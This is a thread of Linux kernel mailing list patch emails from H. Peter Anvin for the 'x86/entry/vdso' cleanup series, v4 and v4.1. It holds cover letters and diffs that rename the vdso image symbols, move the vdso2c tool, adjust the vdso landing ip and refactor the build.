- do_expr(7, IA32_RT_SIGFRAME_sigcontext-4 + IA32_SIGCONTEXT_di)
- do_expr(8, IA32_RT_SIGFRAME_sigcontext-4 + IA32_SIGCONTEXT_ip)
-
- .align 4
-.LENDFDEDLSI2:
+ ud2a
+ CFI_ENDPROC
+ .size __kernel_rt_sigreturn,.-__kernel_rt_sigreturn
.previous
diff --git a/arch/x86/include/asm/dwarf2.h b/arch/x86/include/asm/dwarf2.h
index 302e11b15da8..09c9684d3ad6 100644
--- a/arch/x86/include/asm/dwarf2.h
+++ b/arch/x86/include/asm/dwarf2.h
@@ -20,6 +20,7 @@
#define CFI_RESTORE_STATE .cfi_restore_state
#define CFI_UNDEFINED .cfi_undefined
#define CFI_ESCAPE .cfi_escape
+#define CFI_SIGNAL_FRAME .cfi_signal_frame
#ifndef BUILD_VDSO
/*
diff --git a/arch/x86/kernel/asm-offsets.c b/arch/x86/kernel/asm-offsets.c
index 25fcde525c68..081816888f7a 100644
--- a/arch/x86/kernel/asm-offsets.c
+++ b/arch/x86/kernel/asm-offsets.c
@@ -63,8 +63,14 @@ static void __used common(void)
OFFSET(IA32_SIGCONTEXT_bp, sigcontext_32, bp);
OFFSET(IA32_SIGCONTEXT_sp, sigcontext_32, sp);
OFFSET(IA32_SIGCONTEXT_ip, sigcontext_32, ip);
+ OFFSET(IA32_SIGCONTEXT_es, sigcontext_32, es);
+ OFFSET(IA32_SIGCONTEXT_cs, sigcontext_32, cs);
+ OFFSET(IA32_SIGCONTEXT_ss, sigcontext_32, ss);
+ OFFSET(IA32_SIGCONTEXT_ds, sigcontext_32, ds);
+ OFFSET(IA32_SIGCONTEXT_flags, sigcontext_32, flags);
BLANK();
+ OFFSET(IA32_SIGFRAME_sigcontext, sigframe_ia32, sc);
OFFSET(IA32_RT_SIGFRAME_sigcontext, rt_sigframe_ia32, uc.uc_mcontext);
#endif
--
2.52.0
|
{
"author": "\"H. Peter Anvin\" <hpa@zytor.com>",
"date": "Tue, 6 Jan 2026 13:18:39 -0800",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
This patchset cleans up the vdso build by building the 32- and 64-bit
vdsos in separate directories, moving the vdso2c tool to
arch/x86/tools, and by merging common code and especially Makefile
rules between the 32- and 64-bit vdsos to the greatest extent
possible.
Be more strict about sanitizing and standardizing the vdso build
options.
Disable CFI for the vdso until the kernel adds user space IBT support.
Modernize the DWARF generation in vdso32/sigreturn.S.
Add macros to cleanly call system calls from vdso source code.
Add the GNU_PROPERTY and GNU_STACK PHDRs to the vdso.
When using int $0x80 (old 32-bit hardware or FRED-capable 64-bit
hardware) skip the stack stuff in the 32-bit kernel entry code and
call int $0x80 directly when used from C code.
Changes from v3 to v4:
- Improved description of patch 01/10.
- Split out the move of vdso2c to tools into a separate patch.
- Remove unrelated formatting changes from vdso-layout.lds.S.
- Fix *-x32.o being missing from "targets".
- Rebased onto v6.19-rc1.
Changes from v2 to v3:
In arch/x86/include/asm/vdso/sys_call.h:
- remove stray comment from prototyping (Uros Bizjak)
- remove VDSO_SYSCALL6() since it would require special
handling on 32 bits with frame pointers and is
currently unused. (Uros Bizjak)
- indent nested preprocessor directives.
Changes from v1 to v2:
Too many to count - much of the patchset has been reworked
Patches:
x86/entry/vdso: rename vdso_image_* to vdso*_image
x86/entry/vdso: move vdso2c to arch/x86/tools
x86/entry/vdso: refactor the vdso build
x86/entry/vdso32: don't rely on int80_landing_pad for adjusting ip
x86/entry/vdso32: remove SYSCALL_ENTER_KERNEL macro in sigreturn.S
x86/entry/vdso32: remove open-coded DWARF in sigreturn.S
x86/entry/vdso: include GNU_PROPERTY and GNU_STACK PHDRs
x86/vdso: abstract out vdso system call internals
x86/cpufeature: replace X86_FEATURE_SYSENTER32 with X86_FEATURE_SYSFAST32
x86/entry/vdso32: when using int $0x80, use it directly
---
arch/x86/Kconfig.cpufeatures | 8 +
arch/x86/Makefile | 2 +-
arch/x86/entry/syscall_32.c | 2 +-
arch/x86/entry/vdso/.gitignore | 11 +-
arch/x86/entry/vdso/Makefile | 162 +--------------------
arch/x86/entry/vdso/common/Makefile.include | 89 +++++++++++
arch/x86/entry/vdso/{vdso-note.S => common/note.S} | 5 +-
arch/x86/entry/vdso/{ => common}/vclock_gettime.c | 0
arch/x86/entry/vdso/{ => common}/vdso-layout.lds.S | 38 +++--
arch/x86/entry/vdso/{ => common}/vgetcpu.c | 0
arch/x86/entry/vdso/vdso32/Makefile | 24 +++
arch/x86/entry/vdso/vdso32/note.S | 19 +--
arch/x86/entry/vdso/vdso32/sigreturn.S | 152 +++++--------------
arch/x86/entry/vdso/vdso32/system_call.S | 22 ++-
arch/x86/entry/vdso/vdso32/vclock_gettime.c | 5 +-
arch/x86/entry/vdso/vdso32/vdso32.lds.S | 2 +-
arch/x86/entry/vdso/vdso32/vgetcpu.c | 4 +-
arch/x86/entry/vdso/vdso64/Makefile | 46 ++++++
arch/x86/entry/vdso/vdso64/note.S | 1 +
arch/x86/entry/vdso/vdso64/vclock_gettime.c | 1 +
.../entry/vdso/{vdso.lds.S => vdso64/vdso64.lds.S} | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vdsox32.lds.S | 2 +-
arch/x86/entry/vdso/vdso64/vgetcpu.c | 1 +
.../entry/vdso/{ => vdso64}/vgetrandom-chacha.S | 0
arch/x86/entry/vdso/{ => vdso64}/vgetrandom.c | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vsgx.S | 0
arch/x86/entry/vdso/vma.c | 24 ++-
arch/x86/include/asm/cpufeatures.h | 2 +-
arch/x86/include/asm/dwarf2.h | 1 +
arch/x86/include/asm/elf.h | 2 +-
arch/x86/include/asm/vdso.h | 6 +-
arch/x86/include/asm/vdso/gettimeofday.h | 108 +-------------
arch/x86/include/asm/vdso/sys_call.h | 105 +++++++++++++
arch/x86/kernel/asm-offsets.c | 6 +
arch/x86/kernel/cpu/centaur.c | 3 -
arch/x86/kernel/cpu/common.c | 8 +
arch/x86/kernel/cpu/intel.c | 4 +-
arch/x86/kernel/cpu/zhaoxin.c | 4 +-
arch/x86/kernel/fred.c | 2 +-
arch/x86/kernel/process_64.c | 6 +-
arch/x86/kernel/signal_32.c | 4 +-
arch/x86/tools/Makefile | 15 +-
arch/x86/{entry/vdso => tools}/vdso2c.c | 0
arch/x86/{entry/vdso => tools}/vdso2c.h | 0
arch/x86/xen/setup.c | 28 ++--
arch/x86/xen/smp_pv.c | 5 +-
arch/x86/xen/xen-ops.h | 1 -
47 files changed, 444 insertions(+), 490 deletions(-)
|
There is no fundamental reason to use the int80_landing_pad symbol to
adjust ip when moving the vdso. If ip falls within the vdso, and the
vdso is moved, we should change the ip accordingly, regardless of mode
or location within the vdso. This *currently* can only happen on 32
bits, but there isn't any reason not to do so generically.
Note that if this is ever possible from a vdso-internal call, then the
user space stack would also need to be adjusted (as well as the
shadow stack, if enabled). Fortunately this is not currently the case.
At the moment, we don't even consider other threads when moving the
vdso. The assumption is that it is only used by process freeze/thaw
for migration, where this is not an issue.
Signed-off-by: H. Peter Anvin (Intel) <hpa@zytor.com>
---
arch/x86/entry/vdso/vma.c | 16 ++++++----------
1 file changed, 6 insertions(+), 10 deletions(-)
diff --git a/arch/x86/entry/vdso/vma.c b/arch/x86/entry/vdso/vma.c
index 8f98c2d7c7a9..e7fd7517370f 100644
--- a/arch/x86/entry/vdso/vma.c
+++ b/arch/x86/entry/vdso/vma.c
@@ -65,16 +65,12 @@ static vm_fault_t vdso_fault(const struct vm_special_mapping *sm,
static void vdso_fix_landing(const struct vdso_image *image,
struct vm_area_struct *new_vma)
{
- if (in_ia32_syscall() && image == &vdso32_image) {
- struct pt_regs *regs = current_pt_regs();
- unsigned long vdso_land = image->sym_int80_landing_pad;
- unsigned long old_land_addr = vdso_land +
- (unsigned long)current->mm->context.vdso;
-
- /* Fixing userspace landing - look at do_fast_syscall_32 */
- if (regs->ip == old_land_addr)
- regs->ip = new_vma->vm_start + vdso_land;
- }
+ struct pt_regs *regs = current_pt_regs();
+ unsigned long ipoffset = regs->ip -
+ (unsigned long)current->mm->context.vdso;
+
+ if (ipoffset < image->size)
+ regs->ip = new_vma->vm_start + ipoffset;
}
static int vdso_mremap(const struct vm_special_mapping *sm,
--
2.52.0
|
{
"author": "\"H. Peter Anvin\" <hpa@zytor.com>",
"date": "Tue, 6 Jan 2026 13:18:37 -0800",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
|
It is generally better to build tools in arch/x86/tools to keep host
cflags proliferation down, and to reduce makefile sequencing issues.
Move the vdso build tool vdso2c into arch/x86/tools in preparation for
refactoring the vdso makefiles.
Signed-off-by: H. Peter Anvin (Intel) <hpa@zytor.com>
---
arch/x86/Makefile | 2 +-
arch/x86/entry/vdso/Makefile | 7 +++----
arch/x86/tools/Makefile | 15 ++++++++++-----
arch/x86/{entry/vdso => tools}/vdso2c.c | 0
arch/x86/{entry/vdso => tools}/vdso2c.h | 0
5 files changed, 14 insertions(+), 10 deletions(-)
rename arch/x86/{entry/vdso => tools}/vdso2c.c (100%)
rename arch/x86/{entry/vdso => tools}/vdso2c.h (100%)
diff --git a/arch/x86/Makefile b/arch/x86/Makefile
index 1d403a3612ea..9ab7522ced18 100644
--- a/arch/x86/Makefile
+++ b/arch/x86/Makefile
@@ -252,7 +252,7 @@ endif
archscripts: scripts_basic
- $(Q)$(MAKE) $(build)=arch/x86/tools relocs
+ $(Q)$(MAKE) $(build)=arch/x86/tools relocs vdso2c
###
# Syscall table generation
diff --git a/arch/x86/entry/vdso/Makefile b/arch/x86/entry/vdso/Makefile
index 7f833026d5b2..3d9b09f00c70 100644
--- a/arch/x86/entry/vdso/Makefile
+++ b/arch/x86/entry/vdso/Makefile
@@ -38,13 +38,12 @@ VDSO_LDFLAGS_vdso.lds = -m elf_x86_64 -soname linux-vdso.so.1 \
$(obj)/vdso64.so.dbg: $(obj)/vdso.lds $(vobjs) FORCE
$(call if_changed,vdso_and_check)
-HOST_EXTRACFLAGS += -I$(srctree)/tools/include -I$(srctree)/include/uapi -I$(srctree)/arch/$(SUBARCH)/include/uapi
-hostprogs += vdso2c
+VDSO2C = $(objtree)/arch/x86/tools/vdso2c
quiet_cmd_vdso2c = VDSO2C $@
- cmd_vdso2c = $(obj)/vdso2c $< $(<:%.dbg=%) $@
+ cmd_vdso2c = $(VDSO2C) $< $(<:%.dbg=%) $@
-$(obj)/vdso%-image.c: $(obj)/vdso%.so.dbg $(obj)/vdso%.so $(obj)/vdso2c FORCE
+$(obj)/vdso%-image.c: $(obj)/vdso%.so.dbg $(obj)/vdso%.so $(VDSO2C) FORCE
$(call if_changed,vdso2c)
#
diff --git a/arch/x86/tools/Makefile b/arch/x86/tools/Makefile
index 7278e2545c35..39a183fffd04 100644
--- a/arch/x86/tools/Makefile
+++ b/arch/x86/tools/Makefile
@@ -38,9 +38,14 @@ $(obj)/insn_decoder_test.o: $(srctree)/tools/arch/x86/lib/insn.c $(srctree)/tool
$(obj)/insn_sanity.o: $(srctree)/tools/arch/x86/lib/insn.c $(srctree)/tools/arch/x86/lib/inat.c $(srctree)/tools/arch/x86/include/asm/inat_types.h $(srctree)/tools/arch/x86/include/asm/inat.h $(srctree)/tools/arch/x86/include/asm/insn.h $(objtree)/arch/x86/lib/inat-tables.c
-HOST_EXTRACFLAGS += -I$(srctree)/tools/include
-hostprogs += relocs
-relocs-objs := relocs_32.o relocs_64.o relocs_common.o
-PHONY += relocs
-relocs: $(obj)/relocs
+HOST_EXTRACFLAGS += -I$(srctree)/tools/include -I$(srctree)/include/uapi \
+ -I$(srctree)/arch/$(SUBARCH)/include/uapi
+
+hostprogs += relocs vdso2c
+relocs-objs := relocs_32.o relocs_64.o relocs_common.o
+
+always-y := $(hostprogs)
+
+PHONY += $(hostprogs)
+$(hostprogs): %: $(obj)/%
@:
diff --git a/arch/x86/entry/vdso/vdso2c.c b/arch/x86/tools/vdso2c.c
similarity index 100%
rename from arch/x86/entry/vdso/vdso2c.c
rename to arch/x86/tools/vdso2c.c
diff --git a/arch/x86/entry/vdso/vdso2c.h b/arch/x86/tools/vdso2c.h
similarity index 100%
rename from arch/x86/entry/vdso/vdso2c.h
rename to arch/x86/tools/vdso2c.h
--
2.52.0
|
{
"author": "\"H. Peter Anvin\" <hpa@zytor.com>",
"date": "Tue, 6 Jan 2026 13:18:35 -0800",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
|
The vdso .so files are named vdso*.so. These structures are binary
images and descriptions of these files, so it is more consistent for
them to have names that more directly mirror the filenames.
It is also very slightly more compact (by one character...) and
simplifies the Makefile just a little bit.
Signed-off-by: H. Peter Anvin (Intel) <hpa@zytor.com>
---
arch/x86/entry/syscall_32.c | 2 +-
arch/x86/entry/vdso/.gitignore | 11 ++++-------
arch/x86/entry/vdso/Makefile | 8 ++++----
arch/x86/entry/vdso/vma.c | 10 +++++-----
arch/x86/include/asm/elf.h | 2 +-
arch/x86/include/asm/vdso.h | 6 +++---
arch/x86/kernel/process_64.c | 6 +++---
arch/x86/kernel/signal_32.c | 4 ++--
8 files changed, 23 insertions(+), 26 deletions(-)
diff --git a/arch/x86/entry/syscall_32.c b/arch/x86/entry/syscall_32.c
index a67a644d0cfe..8e829575e12f 100644
--- a/arch/x86/entry/syscall_32.c
+++ b/arch/x86/entry/syscall_32.c
@@ -319,7 +319,7 @@ __visible noinstr bool do_fast_syscall_32(struct pt_regs *regs)
* convention. Adjust regs so it looks like we entered using int80.
*/
unsigned long landing_pad = (unsigned long)current->mm->context.vdso +
- vdso_image_32.sym_int80_landing_pad;
+ vdso32_image.sym_int80_landing_pad;
/*
* SYSENTER loses EIP, and even SYSCALL32 needs us to skip forward
diff --git a/arch/x86/entry/vdso/.gitignore b/arch/x86/entry/vdso/.gitignore
index 37a6129d597b..eb60859dbcbf 100644
--- a/arch/x86/entry/vdso/.gitignore
+++ b/arch/x86/entry/vdso/.gitignore
@@ -1,8 +1,5 @@
# SPDX-License-Identifier: GPL-2.0-only
-vdso.lds
-vdsox32.lds
-vdso32-syscall-syms.lds
-vdso32-sysenter-syms.lds
-vdso32-int80-syms.lds
-vdso-image-*.c
-vdso2c
+*.lds
+*.so
+*.so.dbg
+vdso*-image.c
diff --git a/arch/x86/entry/vdso/Makefile b/arch/x86/entry/vdso/Makefile
index f247f5f5cb44..7f833026d5b2 100644
--- a/arch/x86/entry/vdso/Makefile
+++ b/arch/x86/entry/vdso/Makefile
@@ -16,9 +16,9 @@ vobjs-$(CONFIG_X86_SGX) += vsgx.o
obj-y += vma.o extable.o
# vDSO images to build:
-obj-$(CONFIG_X86_64) += vdso-image-64.o
-obj-$(CONFIG_X86_X32_ABI) += vdso-image-x32.o
-obj-$(CONFIG_COMPAT_32) += vdso-image-32.o vdso32-setup.o
+obj-$(CONFIG_X86_64) += vdso64-image.o
+obj-$(CONFIG_X86_X32_ABI) += vdsox32-image.o
+obj-$(CONFIG_COMPAT_32) += vdso32-image.o vdso32-setup.o
vobjs := $(addprefix $(obj)/, $(vobjs-y))
vobjs32 := $(addprefix $(obj)/, $(vobjs32-y))
@@ -44,7 +44,7 @@ hostprogs += vdso2c
quiet_cmd_vdso2c = VDSO2C $@
cmd_vdso2c = $(obj)/vdso2c $< $(<:%.dbg=%) $@
-$(obj)/vdso-image-%.c: $(obj)/vdso%.so.dbg $(obj)/vdso%.so $(obj)/vdso2c FORCE
+$(obj)/vdso%-image.c: $(obj)/vdso%.so.dbg $(obj)/vdso%.so $(obj)/vdso2c FORCE
$(call if_changed,vdso2c)
#
diff --git a/arch/x86/entry/vdso/vma.c b/arch/x86/entry/vdso/vma.c
index afe105b2f907..8f98c2d7c7a9 100644
--- a/arch/x86/entry/vdso/vma.c
+++ b/arch/x86/entry/vdso/vma.c
@@ -65,7 +65,7 @@ static vm_fault_t vdso_fault(const struct vm_special_mapping *sm,
static void vdso_fix_landing(const struct vdso_image *image,
struct vm_area_struct *new_vma)
{
- if (in_ia32_syscall() && image == &vdso_image_32) {
+ if (in_ia32_syscall() && image == &vdso32_image) {
struct pt_regs *regs = current_pt_regs();
unsigned long vdso_land = image->sym_int80_landing_pad;
unsigned long old_land_addr = vdso_land +
@@ -230,7 +230,7 @@ static int load_vdso32(void)
if (vdso32_enabled != 1) /* Other values all mean "disabled" */
return 0;
- return map_vdso(&vdso_image_32, 0);
+ return map_vdso(&vdso32_image, 0);
}
int arch_setup_additional_pages(struct linux_binprm *bprm, int uses_interp)
@@ -239,7 +239,7 @@ int arch_setup_additional_pages(struct linux_binprm *bprm, int uses_interp)
if (!vdso64_enabled)
return 0;
- return map_vdso(&vdso_image_64, 0);
+ return map_vdso(&vdso64_image, 0);
}
return load_vdso32();
@@ -252,7 +252,7 @@ int compat_arch_setup_additional_pages(struct linux_binprm *bprm,
if (IS_ENABLED(CONFIG_X86_X32_ABI) && x32) {
if (!vdso64_enabled)
return 0;
- return map_vdso(&vdso_image_x32, 0);
+ return map_vdso(&vdsox32_image, 0);
}
if (IS_ENABLED(CONFIG_IA32_EMULATION))
@@ -267,7 +267,7 @@ bool arch_syscall_is_vdso_sigreturn(struct pt_regs *regs)
const struct vdso_image *image = current->mm->context.vdso_image;
unsigned long vdso = (unsigned long) current->mm->context.vdso;
- if (in_ia32_syscall() && image == &vdso_image_32) {
+ if (in_ia32_syscall() && image == &vdso32_image) {
if (regs->ip == vdso + image->sym_vdso32_sigreturn_landing_pad ||
regs->ip == vdso + image->sym_vdso32_rt_sigreturn_landing_pad)
return true;
diff --git a/arch/x86/include/asm/elf.h b/arch/x86/include/asm/elf.h
index 6c8fdc96be7e..2ba5f166e58f 100644
--- a/arch/x86/include/asm/elf.h
+++ b/arch/x86/include/asm/elf.h
@@ -361,7 +361,7 @@ else if (IS_ENABLED(CONFIG_IA32_EMULATION)) \
#define VDSO_ENTRY \
((unsigned long)current->mm->context.vdso + \
- vdso_image_32.sym___kernel_vsyscall)
+ vdso32_image.sym___kernel_vsyscall)
struct linux_binprm;
diff --git a/arch/x86/include/asm/vdso.h b/arch/x86/include/asm/vdso.h
index b7253ef3205a..e8afbe9faa5b 100644
--- a/arch/x86/include/asm/vdso.h
+++ b/arch/x86/include/asm/vdso.h
@@ -27,9 +27,9 @@ struct vdso_image {
long sym_vdso32_rt_sigreturn_landing_pad;
};
-extern const struct vdso_image vdso_image_64;
-extern const struct vdso_image vdso_image_x32;
-extern const struct vdso_image vdso_image_32;
+extern const struct vdso_image vdso64_image;
+extern const struct vdso_image vdsox32_image;
+extern const struct vdso_image vdso32_image;
extern int __init init_vdso_image(const struct vdso_image *image);
diff --git a/arch/x86/kernel/process_64.c b/arch/x86/kernel/process_64.c
index 432c0a004c60..08e72f429870 100644
--- a/arch/x86/kernel/process_64.c
+++ b/arch/x86/kernel/process_64.c
@@ -941,14 +941,14 @@ long do_arch_prctl_64(struct task_struct *task, int option, unsigned long arg2)
#ifdef CONFIG_CHECKPOINT_RESTORE
# ifdef CONFIG_X86_X32_ABI
case ARCH_MAP_VDSO_X32:
- return prctl_map_vdso(&vdso_image_x32, arg2);
+ return prctl_map_vdso(&vdsox32_image, arg2);
# endif
# ifdef CONFIG_IA32_EMULATION
case ARCH_MAP_VDSO_32:
- return prctl_map_vdso(&vdso_image_32, arg2);
+ return prctl_map_vdso(&vdso32_image, arg2);
# endif
case ARCH_MAP_VDSO_64:
- return prctl_map_vdso(&vdso_image_64, arg2);
+ return prctl_map_vdso(&vdso64_image, arg2);
#endif
#ifdef CONFIG_ADDRESS_MASKING
case ARCH_GET_UNTAG_MASK:
diff --git a/arch/x86/kernel/signal_32.c b/arch/x86/kernel/signal_32.c
index 42bbc42bd350..e55cf19e68fe 100644
--- a/arch/x86/kernel/signal_32.c
+++ b/arch/x86/kernel/signal_32.c
@@ -282,7 +282,7 @@ int ia32_setup_frame(struct ksignal *ksig, struct pt_regs *regs)
/* Return stub is in 32bit vsyscall page */
if (current->mm->context.vdso)
restorer = current->mm->context.vdso +
- vdso_image_32.sym___kernel_sigreturn;
+ vdso32_image.sym___kernel_sigreturn;
else
restorer = &frame->retcode;
}
@@ -368,7 +368,7 @@ int ia32_setup_rt_frame(struct ksignal *ksig, struct pt_regs *regs)
restorer = ksig->ka.sa.sa_restorer;
else
restorer = current->mm->context.vdso +
- vdso_image_32.sym___kernel_rt_sigreturn;
+ vdso32_image.sym___kernel_rt_sigreturn;
unsafe_put_user(ptr_to_compat(restorer), &frame->pretcode, Efault);
/*
--
2.52.0
|
{
"author": "\"H. Peter Anvin\" <hpa@zytor.com>",
"date": "Tue, 6 Jan 2026 13:18:34 -0800",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
arch/x86/kernel/cpu/zhaoxin.c | 4 +-
arch/x86/kernel/fred.c | 2 +-
arch/x86/kernel/process_64.c | 6 +-
arch/x86/kernel/signal_32.c | 4 +-
arch/x86/tools/Makefile | 15 +-
arch/x86/{entry/vdso => tools}/vdso2c.c | 0
arch/x86/{entry/vdso => tools}/vdso2c.h | 0
arch/x86/xen/setup.c | 28 ++--
arch/x86/xen/smp_pv.c | 5 +-
arch/x86/xen/xen-ops.h | 1 -
47 files changed, 444 insertions(+), 490 deletions(-)
|
This is intended as a ping, since I think the v4 got swallowed by the
holidays. v4.1 IS BASICALLY A REBASE AND RESEND OF v4; THE ONLY CODE
CHANGE IS A SINGLE SPACE CHARACTER.
This patchset cleans up the vdso build by building the 32- and 64-bit
vdsos in separate directories, moving the vdso2c tool to
arch/x86/tools, and by merging common code and especially Makefile
rules between the 32- and 64-bit vdsos to the greatest extent
possible.
Be more strict about sanitizing and standardizing the vdso build
options.
Disable CFI for the vdso until the kernel adds user space IBT support.
Modernize the DWARF generation in vdso32/sigreturn.S.
Add macros to cleanly call system calls from vdso source code.
Add the GNU_PROPERTY and GNU_STACK PHDRs to the vdso.
When using int $0x80 (old 32-bit hardware or FRED-capable 64-bit
hardware) skip the stack stuff in the 32-bit kernel entry code and
call int $0x80 directly when used from C code.
Changes from v4 to v4.1:
- Fix a single bogus whitespace character change in patch 7.
- Fix the spelling of Uros Bizjak's name in the comment to patch 8.
- Rebased onto v6.19-rc4.
Changes from v3 to v4:
- Improved description of patch 01/10.
- Split out the move of vdso2c to tools into a separate patch.
- Remove unrelated formatting changes from vdso-layout.lds.S.
- Fix *-x32.o being missing from "targets".
- Rebased onto v6.19-rc1.
Changes from v2 to v3:
In arch/x86/include/asm/vdso/sys_call.h:
- Remove stray comment from prototyping (Uros Bizjak)
- Remove VDSO_SYSCALL6() since it would require special
handling on 32 bits with frame pointers and is
currently unused. (Uros Bizjak)
- Indent nested preprocessor directives.
Changes from v1 to v2:
Too many to count - much of the patchset has been reworked
Patches:
x86/entry/vdso: rename vdso_image_* to vdso*_image
x86/entry/vdso: move vdso2c to arch/x86/tools
x86/entry/vdso: refactor the vdso build
x86/entry/vdso32: don't rely on int80_landing_pad for adjusting ip
x86/entry/vdso32: remove SYSCALL_ENTER_KERNEL macro in sigreturn.S
x86/entry/vdso32: remove open-coded DWARF in sigreturn.S
x86/entry/vdso: include GNU_PROPERTY and GNU_STACK PHDRs
x86/vdso: abstract out vdso system call internals
x86/cpufeature: replace X86_FEATURE_SYSENTER32 with X86_FEATURE_SYSFAST32
x86/entry/vdso32: when using int $0x80, use it directly
---
arch/x86/Kconfig.cpufeatures | 8 +
arch/x86/Makefile | 2 +-
arch/x86/entry/syscall_32.c | 2 +-
arch/x86/entry/vdso/.gitignore | 11 +-
arch/x86/entry/vdso/Makefile | 162 +--------------------
arch/x86/entry/vdso/common/Makefile.include | 89 +++++++++++
arch/x86/entry/vdso/{vdso-note.S => common/note.S} | 5 +-
arch/x86/entry/vdso/{ => common}/vclock_gettime.c | 0
arch/x86/entry/vdso/{ => common}/vdso-layout.lds.S | 38 +++--
arch/x86/entry/vdso/{ => common}/vgetcpu.c | 0
arch/x86/entry/vdso/vdso32/Makefile | 24 +++
arch/x86/entry/vdso/vdso32/note.S | 19 +--
arch/x86/entry/vdso/vdso32/sigreturn.S | 152 +++++--------------
arch/x86/entry/vdso/vdso32/system_call.S | 22 ++-
arch/x86/entry/vdso/vdso32/vclock_gettime.c | 5 +-
arch/x86/entry/vdso/vdso32/vdso32.lds.S | 2 +-
arch/x86/entry/vdso/vdso32/vgetcpu.c | 4 +-
arch/x86/entry/vdso/vdso64/Makefile | 46 ++++++
arch/x86/entry/vdso/vdso64/note.S | 1 +
arch/x86/entry/vdso/vdso64/vclock_gettime.c | 1 +
.../entry/vdso/{vdso.lds.S => vdso64/vdso64.lds.S} | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vdsox32.lds.S | 2 +-
arch/x86/entry/vdso/vdso64/vgetcpu.c | 1 +
.../entry/vdso/{ => vdso64}/vgetrandom-chacha.S | 0
arch/x86/entry/vdso/{ => vdso64}/vgetrandom.c | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vsgx.S | 0
arch/x86/entry/vdso/vma.c | 24 ++-
arch/x86/include/asm/cpufeatures.h | 2 +-
arch/x86/include/asm/dwarf2.h | 1 +
arch/x86/include/asm/elf.h | 2 +-
arch/x86/include/asm/vdso.h | 6 +-
arch/x86/include/asm/vdso/gettimeofday.h | 108 +-------------
arch/x86/include/asm/vdso/sys_call.h | 105 +++++++++++++
arch/x86/kernel/asm-offsets.c | 6 +
arch/x86/kernel/cpu/centaur.c | 3 -
arch/x86/kernel/cpu/common.c | 8 +
arch/x86/kernel/cpu/intel.c | 4 +-
arch/x86/kernel/cpu/zhaoxin.c | 4 +-
arch/x86/kernel/fred.c | 2 +-
arch/x86/kernel/process_64.c | 6 +-
arch/x86/kernel/signal_32.c | 4 +-
arch/x86/tools/Makefile | 15 +-
arch/x86/{entry/vdso => tools}/vdso2c.c | 0
arch/x86/{entry/vdso => tools}/vdso2c.h | 0
arch/x86/xen/setup.c | 28 ++--
arch/x86/xen/smp_pv.c | 5 +-
arch/x86/xen/xen-ops.h | 1 -
47 files changed, 444 insertions(+), 490 deletions(-)
|
{
"author": "\"H. Peter Anvin\" <hpa@zytor.com>",
"date": "Tue, 6 Jan 2026 13:18:33 -0800",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
This patchset cleans up the vdso build by building the 32- and 64-bit
vdsos in separate directories, moving the vdso2c tool to
arch/x86/tools, and by merging common code and especially Makefile
rules between the 32- and 64-bit vdsos to the greatest extent
possible.
Be more strict about sanitizing and standardizing the vdso build
options.
Disable CFI for the vdso until the kernel adds user space IBT support.
Modernize the DWARF generation in vdso32/sigreturn.S.
Add macros to cleanly call system calls from vdso source code.
Add the GNU_PROPERTY and GNU_STACK PHDRs to the vdso.
When using int $0x80 (old 32-bit hardware or FRED-capable 64-bit
hardware) skip the stack stuff in the 32-bit kernel entry code and
call int $0x80 directly when used from C code.
Changes from v3 to v4:
- Improved description of patch 01/10.
- Split out the move of vdso2c to tools into a separate patch.
- Remove unrelated formatting changes from vdso-layout.lds.S.
- Fix *-x32.o being missing from "targets".
- Rebased onto v6.19-rc1.
Changes from v2 to v3:
In arch/x86/include/asm/vdso/sys_call.h:
  - remove stray comment from prototyping (Uros Bizjak)
- remove VDSO_SYSCALL6() since it would require special
handling on 32 bits with frame pointers and is
    currently unused. (Uros Bizjak)
- indent nested preprocessor directives.
Changes from v1 to v2:
Too many to count - much of the patchset has been reworked
Patches:
x86/entry/vdso: rename vdso_image_* to vdso*_image
x86/entry/vdso: move vdso2c to arch/x86/tools
x86/entry/vdso: refactor the vdso build
x86/entry/vdso32: don't rely on int80_landing_pad for adjusting ip
x86/entry/vdso32: remove SYSCALL_ENTER_KERNEL macro in sigreturn.S
x86/entry/vdso32: remove open-coded DWARF in sigreturn.S
x86/entry/vdso: include GNU_PROPERTY and GNU_STACK PHDRs
x86/vdso: abstract out vdso system call internals
x86/cpufeature: replace X86_FEATURE_SYSENTER32 with X86_FEATURE_SYSFAST32
x86/entry/vdso32: when using int $0x80, use it directly
---
arch/x86/Kconfig.cpufeatures | 8 +
arch/x86/Makefile | 2 +-
arch/x86/entry/syscall_32.c | 2 +-
arch/x86/entry/vdso/.gitignore | 11 +-
arch/x86/entry/vdso/Makefile | 162 +--------------------
arch/x86/entry/vdso/common/Makefile.include | 89 +++++++++++
arch/x86/entry/vdso/{vdso-note.S => common/note.S} | 5 +-
arch/x86/entry/vdso/{ => common}/vclock_gettime.c | 0
arch/x86/entry/vdso/{ => common}/vdso-layout.lds.S | 38 +++--
arch/x86/entry/vdso/{ => common}/vgetcpu.c | 0
arch/x86/entry/vdso/vdso32/Makefile | 24 +++
arch/x86/entry/vdso/vdso32/note.S | 19 +--
arch/x86/entry/vdso/vdso32/sigreturn.S | 152 +++++--------------
arch/x86/entry/vdso/vdso32/system_call.S | 22 ++-
arch/x86/entry/vdso/vdso32/vclock_gettime.c | 5 +-
arch/x86/entry/vdso/vdso32/vdso32.lds.S | 2 +-
arch/x86/entry/vdso/vdso32/vgetcpu.c | 4 +-
arch/x86/entry/vdso/vdso64/Makefile | 46 ++++++
arch/x86/entry/vdso/vdso64/note.S | 1 +
arch/x86/entry/vdso/vdso64/vclock_gettime.c | 1 +
.../entry/vdso/{vdso.lds.S => vdso64/vdso64.lds.S} | 2 +-
